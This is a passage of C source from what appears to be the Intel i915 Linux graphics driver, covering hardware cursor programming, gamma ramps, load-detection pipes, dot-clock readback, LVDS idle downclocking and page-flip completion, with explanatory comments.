	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	int pipe = intel_crtc->pipe;
	bool visible = base != 0;

	if (intel_crtc->cursor_visible != visible) {
		uint32_t cntl = I915_READ(CURCNTR_IVB(pipe));
		if (base) {
			cntl &= ~CURSOR_MODE;
			cntl |= CURSOR_MODE_64_ARGB_AX | MCURSOR_GAMMA_ENABLE;
		} else {
			cntl &= ~(CURSOR_MODE | MCURSOR_GAMMA_ENABLE);
			cntl |= CURSOR_MODE_DISABLE;
		}
		I915_WRITE(CURCNTR_IVB(pipe), cntl);

		intel_crtc->cursor_visible = visible;
	}
	/* and commit changes on next vblank */
	I915_WRITE(CURBASE_IVB(pipe), base);
}
/* If no-part of the cursor is visible on the framebuffer, then the GPU may hang... */
/*
 * Recompute cursor visibility and position for a CRTC and push the
 * result to hardware via the generation-specific helper.  A base of 0
 * means "hide"; negative coordinates are encoded sign+magnitude in the
 * position register.
 */
static void intel_crtc_update_cursor(struct drm_crtc *crtc,
				     bool on)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	int pipe = intel_crtc->pipe;
	int x = intel_crtc->cursor_x;
	int y = intel_crtc->cursor_y;
	u32 base, pos;
	bool visible;

	pos = 0;

	/* Hide the cursor when off, or when it starts past the fb edge. */
	if (on && crtc->enabled && crtc->fb) {
		base = intel_crtc->cursor_addr;
		if (x > (int) crtc->fb->width)
			base = 0;

		if (y > (int) crtc->fb->height)
			base = 0;
	} else
		base = 0;

	if (x < 0) {
		/* Fully off-screen to the left: hide entirely. */
		if (x + intel_crtc->cursor_width < 0)
			base = 0;

		pos |= CURSOR_POS_SIGN << CURSOR_X_SHIFT;
		x = -x;
	}
	pos |= x << CURSOR_X_SHIFT;

	if (y < 0) {
		if (y + intel_crtc->cursor_height < 0)
			base = 0;

		pos |= CURSOR_POS_SIGN << CURSOR_Y_SHIFT;
		y = -y;
	}
	pos |= y << CURSOR_Y_SHIFT;

	visible = base != 0;
	/* Nothing to do if it was hidden and stays hidden. */
	if (!visible && !intel_crtc->cursor_visible)
		return;

	if (IS_IVYBRIDGE(dev)) {
		I915_WRITE(CURPOS_IVB(pipe), pos);
		ivb_update_cursor(crtc, base);
	} else {
		I915_WRITE(CURPOS(pipe), pos);
		if (IS_845G(dev) || IS_I865G(dev))
			i845_update_cursor(crtc, base);
		else
			i9xx_update_cursor(crtc, base);
	}

	if (visible)
		intel_mark_busy(dev, to_intel_framebuffer(crtc->fb)->obj);
}
/*
 * Set (handle != 0) or clear (handle == 0) the cursor image for a CRTC.
 *
 * Looks up the GEM object, pins it into the GTT (or attaches it as a phys
 * object on hardware that needs a physical cursor), releases the previous
 * cursor buffer, and reprograms the cursor via intel_crtc_update_cursor().
 *
 * Returns 0 on success; -EINVAL for unsupported sizes or tiled buffers,
 * -ENOENT if the handle doesn't resolve, -ENOMEM if the buffer is too
 * small, or the pin/fence/attach error.
 *
 * Fix vs. original: corrected the "buffer is to small" error-message typo.
 */
static int intel_crtc_cursor_set(struct drm_crtc *crtc,
				 struct drm_file *file,
				 uint32_t handle,
				 uint32_t width, uint32_t height)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	struct drm_i915_gem_object *obj;
	uint32_t addr;
	int ret;

	DRM_DEBUG_KMS("\n");

	/* if we want to turn off the cursor ignore width and height */
	if (!handle) {
		DRM_DEBUG_KMS("cursor off\n");
		addr = 0;
		obj = NULL;
		mutex_lock(&dev->struct_mutex);
		goto finish;
	}

	/* Currently we only support 64x64 cursors */
	if (width != 64 || height != 64) {
		DRM_ERROR("we currently only support 64x64 cursors\n");
		return -EINVAL;
	}

	/* NOTE: relies on 'base' being the first member of the intel bo so
	 * that a failed lookup (NULL) still compares equal to NULL here. */
	obj = to_intel_bo(drm_gem_object_lookup(dev, file, handle));
	if (&obj->base == NULL)
		return -ENOENT;

	if (obj->base.size < width * height * 4) {
		DRM_ERROR("buffer is too small\n");
		ret = -ENOMEM;
		goto fail;
	}

	/* we only need to pin inside GTT if cursor is non-phy */
	mutex_lock(&dev->struct_mutex);
	if (!dev_priv->info->cursor_needs_physical) {
		if (obj->tiling_mode) {
			DRM_ERROR("cursor cannot be tiled\n");
			ret = -EINVAL;
			goto fail_locked;
		}

		ret = i915_gem_object_pin_to_display_plane(obj, 0, NULL);
		if (ret) {
			DRM_ERROR("failed to move cursor bo into the GTT\n");
			goto fail_locked;
		}

		ret = i915_gem_object_put_fence(obj);
		if (ret) {
			DRM_ERROR("failed to release fence for cursor");
			goto fail_unpin;
		}

		addr = obj->gtt_offset;
	} else {
		int align = IS_I830(dev) ? 16 * 1024 : 256;
		ret = i915_gem_attach_phys_object(dev, obj,
						  (intel_crtc->pipe == 0) ? I915_GEM_PHYS_CURSOR_0 : I915_GEM_PHYS_CURSOR_1,
						  align);
		if (ret) {
			DRM_ERROR("failed to attach phys object\n");
			goto fail_locked;
		}
		addr = obj->phys_obj->handle->busaddr;
	}

	if (IS_GEN2(dev))
		I915_WRITE(CURSIZE, (height << 12) | width);

 finish:
	/* Release the previous cursor buffer, if any. */
	if (intel_crtc->cursor_bo) {
		if (dev_priv->info->cursor_needs_physical) {
			if (intel_crtc->cursor_bo != obj)
				i915_gem_detach_phys_object(dev, intel_crtc->cursor_bo);
		} else
			i915_gem_object_unpin(intel_crtc->cursor_bo);
		drm_gem_object_unreference(&intel_crtc->cursor_bo->base);
	}

	mutex_unlock(&dev->struct_mutex);

	intel_crtc->cursor_addr = addr;
	intel_crtc->cursor_bo = obj;
	intel_crtc->cursor_width = width;
	intel_crtc->cursor_height = height;

	intel_crtc_update_cursor(crtc, true);

	return 0;
fail_unpin:
	i915_gem_object_unpin(obj);
fail_locked:
	mutex_unlock(&dev->struct_mutex);
fail:
	drm_gem_object_unreference_unlocked(&obj->base);
	return ret;
}
/* Record a new cursor position and reprogram the hardware cursor. */
static int intel_crtc_cursor_move(struct drm_crtc *crtc, int x, int y)
{
	struct intel_crtc *icrtc = to_intel_crtc(crtc);

	icrtc->cursor_x = x;
	icrtc->cursor_y = y;

	/* The actual register programming happens here. */
	intel_crtc_update_cursor(crtc, true);

	return 0;
}
/** Sets the color ramps on behalf of RandR */
void intel_crtc_fb_gamma_set(struct drm_crtc *crtc, u16 red, u16 green,
			     u16 blue, int regno)
{
	struct intel_crtc *icrtc = to_intel_crtc(crtc);

	/* LUT stores 8 bits per channel; keep the high byte of each 16-bit
	 * component. */
	icrtc->lut_r[regno] = red >> 8;
	icrtc->lut_g[regno] = green >> 8;
	icrtc->lut_b[regno] = blue >> 8;
}
/* Read back the stored color ramp, widening each 8-bit LUT entry into the
 * high byte of the 16-bit output. */
void intel_crtc_fb_gamma_get(struct drm_crtc *crtc, u16 *red, u16 *green,
			     u16 *blue, int regno)
{
	struct intel_crtc *icrtc = to_intel_crtc(crtc);

	*red = icrtc->lut_r[regno] << 8;
	*green = icrtc->lut_g[regno] << 8;
	*blue = icrtc->lut_b[regno] << 8;
}
/* Store a slice [start, start+size) of the gamma ramp (clamped to the
 * 256-entry LUT) and push the whole LUT to hardware. */
static void intel_crtc_gamma_set(struct drm_crtc *crtc, u16 *red, u16 *green,
				 u16 *blue, uint32_t start, uint32_t size)
{
	struct intel_crtc *icrtc = to_intel_crtc(crtc);
	uint32_t last = start + size;
	uint32_t i;

	if (last > 256)
		last = 256;

	for (i = start; i < last; i++) {
		icrtc->lut_r[i] = red[i] >> 8;
		icrtc->lut_g[i] = green[i] >> 8;
		icrtc->lut_b[i] = blue[i] >> 8;
	}

	intel_crtc_load_lut(crtc);
}
/**
* Get a pipe with a simple mode set on it for doing load-based monitor
* detection.
*
* It will be up to the load-detect code to adjust the pipe as appropriate for
* its requirements. The pipe will be connected to no other encoders.
*
* Currently this code will only succeed if there is a pipe with no encoders
* configured for it. In the future, it could choose to temporarily disable
* some outputs to free up a pipe for its use.
*
* \return true if a pipe was set up (with *old filled in for the later
* release call), false if no pipe is available.
*/
/* VESA 640x480x72Hz mode to set on the pipe */
/* Minimal, universally-supported timing used only for load-based output
 * detection; negative sync polarity on both axes per the VESA timing. */
static struct drm_display_mode load_detect_mode = {
	DRM_MODE("640x480", DRM_MODE_TYPE_DEFAULT, 31500, 640, 664,
		 704, 832, 0, 480, 489, 491, 520, 0, DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_NVSYNC),
};
static struct drm_framebuffer *
intel_framebuffer_create(struct drm_device *dev,
struct drm_mode_fb_cmd *mode_cmd,
struct drm_i915_gem_object *obj)
{
struct intel_framebuffer *intel_fb;
int ret;
intel_fb = kzalloc(sizeof(*intel_fb), GFP_KERNEL);
if (!intel_fb) {
drm_gem_object_unreference_unlocked(&obj->base);
return ERR_PTR(-ENOMEM);
}
ret = intel_framebuffer_init(dev, intel_fb, mode_cmd, obj);
if (ret) {
drm_gem_object_unreference_unlocked(&obj->base);
kfree(intel_fb);
return ERR_PTR(ret);
}
return &intel_fb->base;
}
/* Bytes per scanline for the given width/bpp, rounded up to the 64-byte
 * alignment the display engine requires. */
static u32
intel_framebuffer_pitch_for_width(int width, int bpp)
{
	u32 bytes_per_line = DIV_ROUND_UP(width * bpp, 8);

	return ALIGN(bytes_per_line, 64);
}
/* Total buffer size needed to back @mode at @bpp, page-aligned. */
static u32
intel_framebuffer_size_for_mode(struct drm_display_mode *mode, int bpp)
{
	u32 stride = intel_framebuffer_pitch_for_width(mode->hdisplay, bpp);

	return ALIGN(stride * mode->vdisplay, PAGE_SIZE);
}
static struct drm_framebuffer *
intel_framebuffer_create_for_mode(struct drm_device *dev,
struct drm_display_mode *mode,
int depth, int bpp)
{
struct drm_i915_gem_object *obj;
struct drm_mode_fb_cmd mode_cmd;
obj = i915_gem_alloc_object(dev,
intel_framebuffer_size_for_mode(mode, bpp));
if (obj == NULL)
return ERR_PTR(-ENOMEM);
mode_cmd.width = mode->hdisplay;
mode_cmd.height = mode->vdisplay;
mode_cmd.depth = depth;
mode_cmd.bpp = bpp;
mode_cmd.pitch = intel_framebuffer_pitch_for_width(mode_cmd.width, bpp);
return intel_framebuffer_create(dev, &mode_cmd, obj);
}
static struct drm_framebuffer *
mode_fits_in_fbdev(struct drm_device *dev,
struct drm_display_mode *mode)
{
struct drm_i915_private *dev_priv = dev->dev_private;
struct drm_i915_gem_object *obj;
struct drm_framebuffer *fb;
if (dev_priv->fbdev == NULL)
return NULL;
obj = dev_priv->fbdev->ifb.obj;
if (obj == NULL)
return NULL;
fb = &dev_priv->fbdev->ifb.base;
if (fb->pitch < intel_framebuffer_pitch_for_width(mode->hdisplay,
fb->bits_per_pixel))
return NULL;
if (obj->base.size < mode->vdisplay * fb->pitch)
return NULL;
return fb;
}
/*
 * Borrow a pipe for load-based output detection (see the comment block
 * above load_detect_mode).  Reuses the connector's existing CRTC when
 * present (turning it on if necessary), otherwise grabs the first unused
 * CRTC the encoder can drive and sets a minimal mode on it, creating a
 * temporary framebuffer if the fbdev one doesn't fit.  State needed to
 * undo all this is recorded in *old for
 * intel_release_load_detect_pipe().
 *
 * Returns true when a pipe is up and has run one full vblank cycle.
 */
bool intel_get_load_detect_pipe(struct intel_encoder *intel_encoder,
				struct drm_connector *connector,
				struct drm_display_mode *mode,
				struct intel_load_detect_pipe *old)
{
	struct intel_crtc *intel_crtc;
	struct drm_crtc *possible_crtc;
	struct drm_encoder *encoder = &intel_encoder->base;
	struct drm_crtc *crtc = NULL;
	struct drm_device *dev = encoder->dev;
	struct drm_framebuffer *old_fb;
	int i = -1;

	DRM_DEBUG_KMS("[CONNECTOR:%d:%s], [ENCODER:%d:%s]\n",
		      connector->base.id, drm_get_connector_name(connector),
		      encoder->base.id, drm_get_encoder_name(encoder));

	/*
	 * Algorithm gets a little messy:
	 *
	 * - if the connector already has an assigned crtc, use it (but make
	 *   sure it's on first)
	 *
	 * - try to find the first unused crtc that can drive this connector,
	 *   and use that if we find one
	 */

	/* See if we already have a CRTC for this connector */
	if (encoder->crtc) {
		crtc = encoder->crtc;

		intel_crtc = to_intel_crtc(crtc);
		old->dpms_mode = intel_crtc->dpms_mode;
		old->load_detect_temp = false;

		/* Make sure the crtc and connector are running */
		if (intel_crtc->dpms_mode != DRM_MODE_DPMS_ON) {
			struct drm_encoder_helper_funcs *encoder_funcs;
			struct drm_crtc_helper_funcs *crtc_funcs;

			crtc_funcs = crtc->helper_private;
			crtc_funcs->dpms(crtc, DRM_MODE_DPMS_ON);

			encoder_funcs = encoder->helper_private;
			encoder_funcs->dpms(encoder, DRM_MODE_DPMS_ON);
		}

		return true;
	}

	/* Find an unused one (if possible) */
	list_for_each_entry(possible_crtc, &dev->mode_config.crtc_list, head) {
		i++;
		if (!(encoder->possible_crtcs & (1 << i)))
			continue;
		if (!possible_crtc->enabled) {
			crtc = possible_crtc;
			break;
		}
	}

	/*
	 * If we didn't find an unused CRTC, don't use any.
	 */
	if (!crtc) {
		DRM_DEBUG_KMS("no pipe available for load-detect\n");
		return false;
	}

	encoder->crtc = crtc;
	connector->encoder = encoder;

	intel_crtc = to_intel_crtc(crtc);
	old->dpms_mode = intel_crtc->dpms_mode;
	old->load_detect_temp = true;
	old->release_fb = NULL;

	if (!mode)
		mode = &load_detect_mode;

	old_fb = crtc->fb;

	/* We need a framebuffer large enough to accommodate all accesses
	 * that the plane may generate whilst we perform load detection.
	 * We can not rely on the fbcon either being present (we get called
	 * during its initialisation to detect all boot displays, or it may
	 * not even exist) or that it is large enough to satisfy the
	 * requested mode.
	 */
	crtc->fb = mode_fits_in_fbdev(dev, mode);
	if (crtc->fb == NULL) {
		DRM_DEBUG_KMS("creating tmp fb for load-detection\n");
		crtc->fb = intel_framebuffer_create_for_mode(dev, mode, 24, 32);
		old->release_fb = crtc->fb;
	} else
		DRM_DEBUG_KMS("reusing fbdev for load-detection framebuffer\n");
	if (IS_ERR(crtc->fb)) {
		DRM_DEBUG_KMS("failed to allocate framebuffer for load-detection\n");
		crtc->fb = old_fb;
		return false;
	}

	if (!drm_crtc_helper_set_mode(crtc, mode, 0, 0, old_fb)) {
		DRM_DEBUG_KMS("failed to set mode on load-detect pipe\n");
		if (old->release_fb)
			old->release_fb->funcs->destroy(old->release_fb);
		crtc->fb = old_fb;
		return false;
	}

	/* let the connector get through one full cycle before testing */
	intel_wait_for_vblank(dev, intel_crtc->pipe);

	return true;
}
/*
 * Undo intel_get_load_detect_pipe(): tear down a temporarily-borrowed
 * pipe (and destroy any temporary framebuffer), or restore the original
 * DPMS state on a pipe that was already assigned to the connector.
 */
void intel_release_load_detect_pipe(struct intel_encoder *intel_encoder,
				    struct drm_connector *connector,
				    struct intel_load_detect_pipe *old)
{
	struct drm_encoder *encoder = &intel_encoder->base;
	struct drm_device *dev = encoder->dev;
	struct drm_crtc *crtc = encoder->crtc;
	struct drm_encoder_helper_funcs *encoder_funcs = encoder->helper_private;
	struct drm_crtc_helper_funcs *crtc_funcs = crtc->helper_private;

	DRM_DEBUG_KMS("[CONNECTOR:%d:%s], [ENCODER:%d:%s]\n",
		      connector->base.id, drm_get_connector_name(connector),
		      encoder->base.id, drm_get_encoder_name(encoder));

	if (old->load_detect_temp) {
		/* Detach the connector; disabling unused functions also
		 * clears encoder->crtc for us. */
		connector->encoder = NULL;
		drm_helper_disable_unused_functions(dev);

		if (old->release_fb)
			old->release_fb->funcs->destroy(old->release_fb);

		return;
	}

	/* Switch crtc and encoder back off if necessary */
	if (old->dpms_mode != DRM_MODE_DPMS_ON) {
		encoder_funcs->dpms(encoder, old->dpms_mode);
		crtc_funcs->dpms(crtc, old->dpms_mode);
	}
}
/* Returns the clock of the currently programmed mode of the given pipe. */
/*
 * Decodes the DPLL and FP registers back into divisor values and feeds
 * them through intel_clock() to reconstruct the dot clock in kHz.
 * Returns 0 when the DPLL mode bits can't be decoded.
 */
static int intel_crtc_clock_get(struct drm_device *dev, struct drm_crtc *crtc)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	int pipe = intel_crtc->pipe;
	u32 dpll = I915_READ(DPLL(pipe));
	u32 fp;
	intel_clock_t clock;

	/* FP0 or FP1 is active depending on the rate-select bit. */
	if ((dpll & DISPLAY_RATE_SELECT_FPA1) == 0)
		fp = I915_READ(FP0(pipe));
	else
		fp = I915_READ(FP1(pipe));

	clock.m1 = (fp & FP_M1_DIV_MASK) >> FP_M1_DIV_SHIFT;
	if (IS_PINEVIEW(dev)) {
		/* Pineview stores N one-hot; ffs()-1 recovers the value. */
		clock.n = ffs((fp & FP_N_PINEVIEW_DIV_MASK) >> FP_N_DIV_SHIFT) - 1;
		clock.m2 = (fp & FP_M2_PINEVIEW_DIV_MASK) >> FP_M2_DIV_SHIFT;
	} else {
		clock.n = (fp & FP_N_DIV_MASK) >> FP_N_DIV_SHIFT;
		clock.m2 = (fp & FP_M2_DIV_MASK) >> FP_M2_DIV_SHIFT;
	}

	if (!IS_GEN2(dev)) {
		/* P1 is stored as a one-hot bitmask on gen3+. */
		if (IS_PINEVIEW(dev))
			clock.p1 = ffs((dpll & DPLL_FPA01_P1_POST_DIV_MASK_PINEVIEW) >>
				DPLL_FPA01_P1_POST_DIV_SHIFT_PINEVIEW);
		else
			clock.p1 = ffs((dpll & DPLL_FPA01_P1_POST_DIV_MASK) >>
				       DPLL_FPA01_P1_POST_DIV_SHIFT);

		switch (dpll & DPLL_MODE_MASK) {
		case DPLLB_MODE_DAC_SERIAL:
			clock.p2 = dpll & DPLL_DAC_SERIAL_P2_CLOCK_DIV_5 ?
				5 : 10;
			break;
		case DPLLB_MODE_LVDS:
			clock.p2 = dpll & DPLLB_LVDS_P2_CLOCK_DIV_7 ?
				7 : 14;
			break;
		default:
			DRM_DEBUG_KMS("Unknown DPLL mode %08x in programmed "
				  "mode\n", (int)(dpll & DPLL_MODE_MASK));
			return 0;
		}

		/* XXX: Handle the 100Mhz refclk */
		intel_clock(dev, 96000, &clock);
	} else {
		bool is_lvds = (pipe == 1) && (I915_READ(LVDS) & LVDS_PORT_EN);

		if (is_lvds) {
			clock.p1 = ffs((dpll & DPLL_FPA01_P1_POST_DIV_MASK_I830_LVDS) >>
				       DPLL_FPA01_P1_POST_DIV_SHIFT);
			clock.p2 = 14;

			if ((dpll & PLL_REF_INPUT_MASK) ==
			    PLLB_REF_INPUT_SPREADSPECTRUMIN) {
				/* XXX: might not be 66MHz */
				intel_clock(dev, 66000, &clock);
			} else
				intel_clock(dev, 48000, &clock);
		} else {
			if (dpll & PLL_P1_DIVIDE_BY_TWO)
				clock.p1 = 2;
			else {
				clock.p1 = ((dpll & DPLL_FPA01_P1_POST_DIV_MASK_I830) >>
					    DPLL_FPA01_P1_POST_DIV_SHIFT) + 2;
			}
			if (dpll & PLL_P2_DIVIDE_BY_4)
				clock.p2 = 4;
			else
				clock.p2 = 2;

			intel_clock(dev, 48000, &clock);
		}
	}

	/* XXX: It would be nice to validate the clocks, but we can't reuse
	 * i830PllIsValid() because it relies on the xf86_config connector
	 * configuration being accurate, which it isn't necessarily.
	 */

	return clock.dot;
}
/** Returns the currently programmed mode of the given pipe. */
struct drm_display_mode *intel_crtc_mode_get(struct drm_device *dev,
					     struct drm_crtc *crtc)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	int pipe = intel_crtc->pipe;
	struct drm_display_mode *mode;
	int htotal_reg = I915_READ(HTOTAL(pipe));
	int hsync_reg = I915_READ(HSYNC(pipe));
	int vtotal_reg = I915_READ(VTOTAL(pipe));
	int vsync_reg = I915_READ(VSYNC(pipe));

	mode = kzalloc(sizeof(*mode), GFP_KERNEL);
	if (mode == NULL)
		return NULL;

	/* Each timing register holds value-minus-one: the active/start
	 * count in the low word and the total/end count in the high word.
	 */
	mode->clock = intel_crtc_clock_get(dev, crtc);
	mode->hdisplay = (htotal_reg & 0xffff) + 1;
	mode->htotal = ((htotal_reg & 0xffff0000) >> 16) + 1;
	mode->hsync_start = (hsync_reg & 0xffff) + 1;
	mode->hsync_end = ((hsync_reg & 0xffff0000) >> 16) + 1;
	mode->vdisplay = (vtotal_reg & 0xffff) + 1;
	mode->vtotal = ((vtotal_reg & 0xffff0000) >> 16) + 1;
	mode->vsync_start = (vsync_reg & 0xffff) + 1;
	mode->vsync_end = ((vsync_reg & 0xffff0000) >> 16) + 1;

	drm_mode_set_name(mode);
	drm_mode_set_crtcinfo(mode, 0);

	return mode;
}
#define GPU_IDLE_TIMEOUT 500 /* ms */

/* When this timer fires, we've been idle for awhile */
static void intel_gpu_idle_timer(unsigned long arg)
{
	struct drm_device *dev = (struct drm_device *)arg;
	drm_i915_private_t *dev_priv = dev->dev_private;

	if (!list_empty(&dev_priv->mm.active_list)) {
		/* Still processing requests, so just re-arm the timer. */
		mod_timer(&dev_priv->idle_timer, jiffies +
			  msecs_to_jiffies(GPU_IDLE_TIMEOUT));
		return;
	}

	dev_priv->busy = false;
	/* Defer the actual clock adjustment to process context; the work
	 * item is serviced by intel_idle_update(). */
	queue_work(dev_priv->wq, &dev_priv->idle_work);
}
#define CRTC_IDLE_TIMEOUT 1000 /* ms */

/* Per-CRTC idle timer: fires when the CRTC's framebuffer has seen no GPU
 * activity for CRTC_IDLE_TIMEOUT ms, and kicks the idle work to consider
 * downclocking. */
static void intel_crtc_idle_timer(unsigned long arg)
{
	struct intel_crtc *intel_crtc = (struct intel_crtc *)arg;
	struct drm_crtc *crtc = &intel_crtc->base;
	drm_i915_private_t *dev_priv = crtc->dev->dev_private;
	struct intel_framebuffer *intel_fb;

	intel_fb = to_intel_framebuffer(crtc->fb);
	if (intel_fb && intel_fb->obj->active) {
		/* The framebuffer is still being accessed by the GPU. */
		mod_timer(&intel_crtc->idle_timer, jiffies +
			  msecs_to_jiffies(CRTC_IDLE_TIMEOUT));
		return;
	}

	intel_crtc->busy = false;
	/* Defer clock changes to process context (intel_idle_update). */
	queue_work(dev_priv->wq, &dev_priv->idle_work);
}
/* Restore the full (non-downclocked) LVDS dot clock on pre-PCH hardware
 * and (re)arm the per-CRTC idle timer so we downclock again once idle.
 * No-op on PCH-split platforms or when no downclock is available. */
static void intel_increase_pllclock(struct drm_crtc *crtc)
{
	struct drm_device *dev = crtc->dev;
	drm_i915_private_t *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	int pipe = intel_crtc->pipe;
	int dpll_reg = DPLL(pipe);
	int dpll;

	if (HAS_PCH_SPLIT(dev))
		return;

	if (!dev_priv->lvds_downclock_avail)
		return;

	dpll = I915_READ(dpll_reg);
	if (!HAS_PIPE_CXSR(dev) && (dpll & DISPLAY_RATE_SELECT_FPA1)) {
		DRM_DEBUG_DRIVER("upclocking LVDS\n");

		/* Unlock panel regs */
		I915_WRITE(PP_CONTROL,
			   I915_READ(PP_CONTROL) | PANEL_UNLOCK_REGS);

		/* Clearing FPA1 selects the full-rate divisor. */
		dpll &= ~DISPLAY_RATE_SELECT_FPA1;
		I915_WRITE(dpll_reg, dpll);
		/* Wait a vblank for the change to take effect, then verify. */
		intel_wait_for_vblank(dev, pipe);
		dpll = I915_READ(dpll_reg);
		if (dpll & DISPLAY_RATE_SELECT_FPA1)
			DRM_DEBUG_DRIVER("failed to upclock LVDS!\n");

		/* ...and lock them again */
		I915_WRITE(PP_CONTROL, I915_READ(PP_CONTROL) & 0x3);
	}

	/* Schedule downclock */
	mod_timer(&intel_crtc->idle_timer, jiffies +
		  msecs_to_jiffies(CRTC_IDLE_TIMEOUT));
}
/* Switch the LVDS panel to the reduced (downclocked) dot clock on
 * pre-PCH hardware.  Called from the idle work when the CRTC has been
 * idle long enough. */
static void intel_decrease_pllclock(struct drm_crtc *crtc)
{
	struct drm_device *dev = crtc->dev;
	drm_i915_private_t *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	int pipe = intel_crtc->pipe;
	int dpll_reg = DPLL(pipe);
	int dpll = I915_READ(dpll_reg);

	if (HAS_PCH_SPLIT(dev))
		return;

	if (!dev_priv->lvds_downclock_avail)
		return;

	/*
	 * Since this is called by a timer, we should never get here in
	 * the manual case.
	 */
	if (!HAS_PIPE_CXSR(dev) && intel_crtc->lowfreq_avail) {
		DRM_DEBUG_DRIVER("downclocking LVDS\n");

		/* Unlock panel regs */
		I915_WRITE(PP_CONTROL, I915_READ(PP_CONTROL) |
			   PANEL_UNLOCK_REGS);

		/* Setting FPA1 selects the reduced-rate divisor. */
		dpll |= DISPLAY_RATE_SELECT_FPA1;
		I915_WRITE(dpll_reg, dpll);
		/* Give the change a vblank to land, then verify it stuck. */
		intel_wait_for_vblank(dev, pipe);
		dpll = I915_READ(dpll_reg);
		if (!(dpll & DISPLAY_RATE_SELECT_FPA1))
			DRM_DEBUG_DRIVER("failed to downclock LVDS!\n");

		/* ...and lock them again */
		I915_WRITE(PP_CONTROL, I915_READ(PP_CONTROL) & 0x3);
	}
}
/**
 * intel_idle_update - adjust clocks for idleness
 * @work: work struct
 *
 * Either the GPU or display (or both) went idle.  Check the busy status
 * here and adjust the CRTC and GPU clocks as necessary.
 */
static void intel_idle_update(struct work_struct *work)
{
	drm_i915_private_t *dev_priv = container_of(work, drm_i915_private_t,
						    idle_work);
	struct drm_device *dev = dev_priv->dev;
	struct drm_crtc *crtc;
	struct intel_crtc *intel_crtc;

	/* Nothing to do if powersaving is disabled via the module option. */
	if (!i915_powersave)
		return;

	mutex_lock(&dev->struct_mutex);

	i915_update_gfx_val(dev_priv);

	list_for_each_entry(crtc, &dev->mode_config.crtc_list, head) {
		/* Skip inactive CRTCs */
		if (!crtc->fb)
			continue;

		intel_crtc = to_intel_crtc(crtc);
		if (!intel_crtc->busy)
			intel_decrease_pllclock(crtc);
	}

	mutex_unlock(&dev->struct_mutex);
}
/**
 * intel_mark_busy - mark the GPU and possibly the display busy
 * @dev: drm device
 * @obj: object we're operating on
 *
 * Callers can use this function to indicate that the GPU is busy processing
 * commands.  If @obj matches one of the CRTC objects (i.e. it's a scanout
 * buffer), we'll also mark the display as busy, so we know to increase its
 * clock frequency.
 */
void intel_mark_busy(struct drm_device *dev, struct drm_i915_gem_object *obj)
{
	drm_i915_private_t *dev_priv = dev->dev_private;
	struct drm_crtc *crtc = NULL;
	struct intel_framebuffer *intel_fb;
	struct intel_crtc *intel_crtc;

	if (!drm_core_check_feature(dev, DRIVER_MODESET))
		return;

	/* First transition to busy just sets the flag; subsequent calls
	 * push the GPU idle timer further into the future. */
	if (!dev_priv->busy)
		dev_priv->busy = true;
	else
		mod_timer(&dev_priv->idle_timer, jiffies +
			  msecs_to_jiffies(GPU_IDLE_TIMEOUT));

	list_for_each_entry(crtc, &dev->mode_config.crtc_list, head) {
		if (!crtc->fb)
			continue;

		intel_crtc = to_intel_crtc(crtc);
		intel_fb = to_intel_framebuffer(crtc->fb);
		if (intel_fb->obj == obj) {
			if (!intel_crtc->busy) {
				/* Non-busy -> busy, upclock */
				intel_increase_pllclock(crtc);
				intel_crtc->busy = true;
			} else {
				/* Busy -> busy, put off timer */
				mod_timer(&intel_crtc->idle_timer, jiffies +
					  msecs_to_jiffies(CRTC_IDLE_TIMEOUT));
			}
		}
	}
}
/* Tear down a CRTC: cancel any pending unpin work (taking the event lock
 * to safely detach it first), then release the DRM CRTC and our wrapper. */
static void intel_crtc_destroy(struct drm_crtc *crtc)
{
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	struct drm_device *dev = crtc->dev;
	struct intel_unpin_work *work;
	unsigned long flags;

	/* Detach the unpin work under the event lock so the flip-complete
	 * path cannot race with us. */
	spin_lock_irqsave(&dev->event_lock, flags);
	work = intel_crtc->unpin_work;
	intel_crtc->unpin_work = NULL;
	spin_unlock_irqrestore(&dev->event_lock, flags);

	if (work) {
		/* Wait for a possibly in-flight execution, then free. */
		cancel_work_sync(&work->work);
		kfree(work);
	}

	drm_crtc_cleanup(crtc);

	kfree(intel_crtc);
}
/* Deferred (workqueue) completion of a page flip: unpin the old
 * framebuffer, drop the references taken when the flip was queued, and
 * re-evaluate FBC now that the scanout source has changed. */
static void intel_unpin_work_fn(struct work_struct *__work)
{
	struct intel_unpin_work *work =
		container_of(__work, struct intel_unpin_work, work);

	mutex_lock(&work->dev->struct_mutex);
	i915_gem_object_unpin(work->old_fb_obj);
	/* Drop the references taken in intel_crtc_page_flip(). */
	drm_gem_object_unreference(&work->pending_flip_obj->base);
	drm_gem_object_unreference(&work->old_fb_obj->base);

	intel_update_fbc(work->dev);
	mutex_unlock(&work->dev->struct_mutex);
	kfree(work);
}
/* Common flip-complete handler, called from the vblank interrupt paths.
 * Sends the userspace vblank event (with a timestamp corrected for a
 * possibly-stale vblank count), releases the vblank reference, clears the
 * pending-flip bit on the old object, and hands the unpin work off to a
 * workqueue. */
static void do_intel_finish_page_flip(struct drm_device *dev,
				      struct drm_crtc *crtc)
{
	drm_i915_private_t *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	struct intel_unpin_work *work;
	struct drm_i915_gem_object *obj;
	struct drm_pending_vblank_event *e;
	struct timeval tnow, tvbl;
	unsigned long flags;

	/* Ignore early vblank irqs */
	if (intel_crtc == NULL)
		return;

	do_gettimeofday(&tnow);

	spin_lock_irqsave(&dev->event_lock, flags);
	work = intel_crtc->unpin_work;
	/* No flip queued, or queued but not yet armed by
	 * intel_prepare_page_flip() -- nothing to complete. */
	if (work == NULL || !work->pending) {
		spin_unlock_irqrestore(&dev->event_lock, flags);
		return;
	}

	intel_crtc->unpin_work = NULL;

	if (work->event) {
		e = work->event;
